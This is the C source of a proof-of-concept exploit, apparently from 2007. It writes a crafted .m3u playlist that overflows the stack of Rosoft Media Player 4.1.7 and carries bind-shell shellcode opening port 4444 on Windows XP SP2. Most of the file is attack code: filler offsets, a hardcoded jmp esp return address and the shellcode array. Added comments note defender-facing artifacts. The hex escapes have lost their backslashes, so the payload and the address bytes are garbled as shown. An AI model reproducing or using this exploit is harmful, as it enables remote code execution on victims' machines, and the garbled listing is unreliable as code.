
# Title : Rosoft Media Player <= 4.1.7 .M3U Stack Overflow Exploit
# Published : 2007-12-18
# Author : devcode


/* rosoft-player-expl.c: 2007-12-18:
 *
 * Copyright (c) 2007 devcode
 *
 *
 *          ^^ D E V C O D E ^^
 *
 * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
 * [0-DAY]
 *
 *
 * Description:
 *    A stack overflow occurs when parsing an .m3u file
 *    which does not contain any delimiters.
 *
 * Hotfix/Patch:
 *    None.
 *
 * Vulnerable systems:
 *    Rosoft Media Player <= 4.1.7
 *
 * Tested on:
 *    Rosoft Media Player 4.1.7
 *
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is
 *    used for any other purposes than the one stated above.
 *
 * Notes:
 *    Nothing much here, except the player itself is a piece of shit.
 *    The vulnerability was found by Juan Pablo Lopez Yacubian
 *    (jplopezy_at_gmail.com). Come to think of it, the entire suite
 *    of products offered by Rosoft Engineering sucks bawls.
 *
 */
#include <stdlib.h>
#include <stdio.h>

/**
 * Payload buffer, copied into the generated file after the return-address
 * slot (see main()).
 *
 * Per the generator's own notes: metasploit win32_bind, EXITFUNC=thread,
 * LPORT=4444, Size=344, encoder PexFnstenvSub, with 0x1A 0x0A 0x0D 0x00
 * listed as bytes the .m3u parser will not accept in the payload.
 * Defender's note: the observable effect of this payload is the media
 * player process opening a listening TCP socket on port 4444, which is the
 * network artifact to watch for.
 *
 * Because the array is initialized from a string literal, sizeof() on it
 * counts the trailing NUL as well; main() copies that NUL along with the
 * payload, and since 0x00 is excluded from the payload bytes above, that
 * is presumably the first NUL in the buffer and what terminates fputs().
 *
 * NOTE(review): in this listing the hex escape prefixes have lost their
 * backslashes (an extraction artifact), so the literal's byte count as
 * shown does not match the Size=344 stated above.
 */
unsigned char uszShellcode[] =
    "x90x90x90x90x90x90x90x90"
    "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x60"
    "x90xf0xf7x83xebxfcxe2xf4x9cxfax1bxbax88x69x0fx08"
    "x9fxf0x7bx9bx44xb4x7bxb2x5cx1bx8cxf2x18x91x1fx7c"
    "x2fx88x7bxa8x40x91x1bxbexebxa4x7bxf6x8exa1x30x6e"
    "xccx14x30x83x67x51x3axfax61x52x1bx03x5bxc4xd4xdf"
    "x15x75x7bxa8x44x91x1bx91xebx9cxbbx7cx3fx8cxf1x1c"
    "x63xbcx7bx7ex0cxb4xecx96xa3xa1x2bx93xebxd3xc0x7c"
    "x20x9cx7bx87x7cx3dx7bxb7x68xcex98x79x2ex9ex1cxa7"
    "x9fx46x96xa4x06xf8xc3xc5x08xe7x83xc5x3fxc4x0fx27"
    "x08x5bx1dx0bx5bxc0x0fx21x3fx19x15x91xe1x7dxf8xf5"
    "x35xfaxf2x08xb0xf8x29xfex95x3dxa7x08xb6xc3xa3xa4"
    "x33xc3xb3xa4x23xc3x0fx27x06xf8xe1xabx06xc3x79x16"
    "xf5xf8x54xedx10x57xa7x08xb6xfaxe0xa6x35x6fx20x9f"
    "xc4x3dxdex1ex37x6fx26xa4x35x6fx20x9fx85xd9x76xbe"
    "x37x6fx26xa7x34xc4xa5x08xb0x03x98x10x19x56x89xa0"
    "x9fx46xa5x08xb0xf6x9ax93x06xf8x93x9axe9x75x9axa7"
    "x39xb9x3cx7ex87xfaxb4x7ex82xa1x30x04xcax6exb2xda"
    "x9exd2xdcx64xedxeaxc8x5cxcbx3bx98x85x9ex23xe6x08"
    "x15xd4x0fx21x3bxc7xa2xa6x31xc1x9axf6x31xc1xa5xa6"
    "x9fx40x98x5axb9x95x3exa4x9fx46x9ax08x9fxa7x0fx27"
    "xebxc7x0cx74xa4xf4x0fx21x32x6fx20x9fx8fx5ex10x97"
    "x33x6fx26x08xb0x90xf0xf7";

/**
 * Entry point: writes the crafted .m3u file to the path given in argv[1].
 *
 * Returns 0 on success, -1 when no path is given or the file cannot be
 * created.
 *
 * The output is one line with no newline or other delimiter (the header
 * above says the overflow is triggered by an .m3u without delimiters):
 * 0x41 filler, then at fixed offsets the two addresses documented inline,
 * then the payload. Both addresses are taken from one specific Windows
 * build, so the file is tied to that build.
 *
 * Defender's note: the on-disk artifact is a playlist file whose only
 * line is several kilobytes of 'A' (0x41) with no line ending — a simple
 * property for a file-scanning rule or a length check in a playlist
 * parser to flag.
 *
 * Code notes: memset()/memcpy() are used without including <string.h>
 * (implicit declarations); the malloc() result is not checked before use;
 * the copies at fixed offsets assume the payload fits inside the 5000-byte
 * allocation, with no bounds check; fclose()'s return value is ignored.
 */
int main( int argc, char **argv ) {
    FILE *f = NULL;
    char *p = NULL;

    /* Banner. The escape sequences in these literals appear mangled in
     * this listing; the strings are kept exactly as shown. */
    printf( "ntRosoft Media Player <= 4.1.7 .M3U Stack Overflownn" );
    printf( "ttCopyright (c) 2007 devcodennn" );

    if ( argc < 2 ) {
        printf( "Usage: %s <file>n", argv[0] );
        return -1;
    }
   
    /* "w+" truncates any existing file at argv[1]. */
    f = fopen( argv[1], "w+" );
    if ( !f ) {
        printf( "[-] Unable to create m3u file.n" );
        return -1;
    }

    /* 5000 bytes of 0x41 filler; malloc() failure is not handled here. */
    p = (char *)malloc( 5000 );
    memset( p, 0x41, 5000 );

    /**
     * Author's note on the slot at offset 4096: it needs an address that
     * is writable, holds a value of 0, and contains no 0x00 byte itself;
     * 0x7FFDFFF0 is used, with 0x1270FE0 named as the fallback if that
     * one does not work.
     */
    memcpy( p+4096, "xF0xFFxFDx7F", 4 );

    /**
     * Return-address slot at offset 4104: per the author, a jmp esp in
     * ntdll.dll on Windows XP SP2 Pro (0x7C941EED). Valid only on that
     * exact build.
     */
    memcpy( p+4104, "xEDx1Ex94x7C", 4 );
    /* sizeof counts the literal's terminating NUL, so it is copied as well
     * and is what later stops fputs(). */
    memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );

    /**
     * Write the buffer out as a single line (fputs stops at the first NUL
     * and adds no newline), then release the file and the buffer.
     */
    fputs( p, f );
    fclose( f );
    free( p );

    printf( "[*] File generated succesfully!n" );
    return 0;
}
